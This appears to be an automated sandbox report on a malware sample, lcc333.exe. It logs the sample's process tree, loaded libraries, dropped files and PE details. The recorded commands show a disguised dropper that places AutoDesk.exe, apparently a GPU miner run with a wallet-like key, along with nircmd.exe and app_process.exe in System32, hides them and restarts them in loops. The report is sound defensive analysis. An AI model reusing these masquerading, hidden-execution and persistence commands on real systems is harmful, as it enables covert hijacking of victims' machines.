                        Source: lcc333.exe, 00000002.00000003.2491611998.000002B9372A3000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2492290000.000002B93730F000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2491866704.000002B936B7C000.00000004.00000020.00020000.00000000.sdmp, app_process.exe, 00000012.00000002.3348387189.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000012.00000000.2525092693.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000002.3347236766.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000000.2527968271.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000002.3357087112.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000000.3341938213.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000023.00000002.3357025814.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: lcc333.exe, 00000002.00000003.2491611998.000002B9372A3000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2492290000.000002B93730F000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2491866704.000002B936B7C000.00000004.00000020.00020000.00000000.sdmp, app_process.exe, 00000012.00000002.3348387189.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000012.00000000.2525092693.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000002.3347236766.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000000.2527968271.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000002.3357087112.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000000.3341938213.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000023.00000002.3357025814.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: lcc333.exe, 00000002.00000003.2491611998.000002B9372A3000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2492290000.000002B93730F000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2491866704.000002B936B7C000.00000004.00000020.00020000.00000000.sdmp, app_process.exe, 00000012.00000002.3348387189.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000012.00000000.2525092693.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000002.3347236766.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000000.2527968271.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000002.3357087112.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000000.3341938213.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000023.00000002.3357025814.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: C:\Users\user\Desktop\lcc333.exeFile read: C:\Users\user\Desktop\lcc333.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\lcc333.exe "C:\Users\user\Desktop\lcc333.exe"
                        Source: C:\Users\user\Desktop\lcc333.exeProcess created: C:\Users\user\Desktop\lcc333.exe "C:\Users\user\Desktop\lcc333.exe"
                        Source: C:\Users\user\Desktop\lcc333.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c python.bat
                        Source: C:\Users\user\Desktop\lcc333.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c play.bat
                        Source: C:\Users\user\Desktop\lcc333.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\Desktop\lcc333.bat
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 120
                        Source: C:\Windows\System32\nircmd.exeProcess created: C:\Windows\System32\app_process.exe "app_process.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\AutoDesk.exe AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs
                        Source: C:\Windows\System32\app_process.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"
                        Source: C:\Windows\System32\nircmd.exeProcess created: C:\Windows\System32\app_process.exe "app_process.exe"
                        Source: C:\Windows\System32\app_process.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 600
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im AutoDesk.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 120
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\AutoDesk.exe AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im app_process.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"
                        Source: C:\Windows\System32\nircmd.exeProcess created: C:\Windows\System32\app_process.exe "app_process.exe"
                        Source: C:\Windows\System32\app_process.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"
                        Source: C:\Windows\System32\nircmd.exeProcess created: C:\Windows\System32\app_process.exe "app_process.exe"
                        Source: C:\Windows\System32\app_process.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 600
                        Source: C:\Users\user\Desktop\lcc333.exeProcess created: C:\Users\user\Desktop\lcc333.exe "C:\Users\user\Desktop\lcc333.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c python.batJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c play.batJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\Desktop\lcc333.batJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 120Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im AutoDesk.exeJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 120Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 600Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im app_process.exeJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 600Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\AutoDesk.exe AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAsJump to behavior
                        Source: C:\Windows\System32\nircmd.exeProcess created: C:\Windows\System32\app_process.exe "app_process.exe"Jump to behavior
                        Source: C:\Windows\System32\nircmd.exeProcess created: C:\Windows\System32\app_process.exe "app_process.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\AutoDesk.exe AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs
                        Source: C:\Windows\System32\nircmd.exeProcess created: C:\Windows\System32\app_process.exe "app_process.exe"Jump to behavior
                        Source: C:\Windows\System32\nircmd.exeProcess created: C:\Windows\System32\app_process.exe "app_process.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeSection loaded: python3.dllJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeSection loaded: libcrypto-3.dllJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeSection loaded: libssl-3.dllJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\nircmd.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\System32\nircmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: nvcuda.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: nvml.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\nircmd.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: nvcuda.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: nvml.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\AutoDesk.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\nircmd.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\nircmd.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\app_process.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: lcc333.exeStatic PE information: Image base 0x140000000 > 0x60000000
                        Source: lcc333.exeStatic file information: File size 8547394 > 1048576
                        Source: lcc333.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: lcc333.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: lcc333.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: lcc333.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: lcc333.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: lcc333.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: lcc333.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: lcc333.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: lcc333.exe, 00000000.00000003.2111135941.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: lcc333.exe, 00000000.00000003.2111291391.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: lcc333.exe, 00000000.00000003.2105250934.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
                        Source: Binary string: c:\Projects\VS2005\NirCmd\x64\release\NirCmd.pdb source: nircmd.exe, 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000000F.00000000.2523657662.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000002.2528526092.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000000.2526970311.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000001F.00000000.3340727157.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000001F.00000002.3344008939.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000022.00000000.3344394477.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000022.00000002.3347749954.0000000140017000.00000002.00000001.01000000.00000013.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: lcc333.exe, 00000000.00000003.2105424268.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: lcc333.exe, 00000000.00000003.2105823533.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: lcc333.exe, 00000000.00000003.2105424268.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: lcc333.exe, 00000000.00000003.2104927615.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: lcc333.exe, 00000000.00000003.2104758993.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: lcc333.exe, 00000000.00000003.2104758993.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: lcc333.exe, 00000000.00000003.2105914516.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: lcc333.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: lcc333.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: lcc333.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: lcc333.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: lcc333.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140007DE4 FreeLibrary,LoadLibraryA,GetProcAddress,memset,GetLastError,FreeLibrary,memset,CreateProcessA,GetLastError,FreeLibrary,15_2_0000000140007DE4
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .|q6
                        Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
                        Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
                        Source: python312.dll.0.drStatic PE information: section name: PyRuntim
                        Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
                        Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                        Source: AutoDesk.exe.2.drStatic PE information: section name: __nv_mod
                        Source: AutoDesk.exe.2.drStatic PE information: section name: __nv_rel
                        Source: AutoDesk.exe.2.drStatic PE information: section name: .nvFatBi
                        Source: AutoDesk.exe.2.drStatic PE information: section name: .nv_fatb
                        Source: AutoDesk.exe.2.drStatic PE information: section name: .`[w
                        Source: AutoDesk.exe.2.drStatic PE information: section name: .[dL
                        Source: AutoDesk.exe.2.drStatic PE information: section name: .|q6

                        Persistence and Installation Behavior

                        barindex
                        Drops executables to the windows directory (C:\Windows) and starts them
                        Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\nircmd.exeJump to behavior
                        Source: C:\Windows\System32\nircmd.exeExecutable created and started: C:\Windows\System32\app_process.exeJump to behavior
                        Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\AutoDesk.exe
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\_ssl.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\_decimal.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\_queue.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Windows\System32\nircmd.exeJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\select.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Windows\System32\AutoDesk.exeJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\VCRUNTIME140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\python312.dllJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Windows\System32\app_process.exeJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\_lzma.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\_socket.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\libcrypto-3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\_bz2.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122\libssl-3.dllJump to dropped file
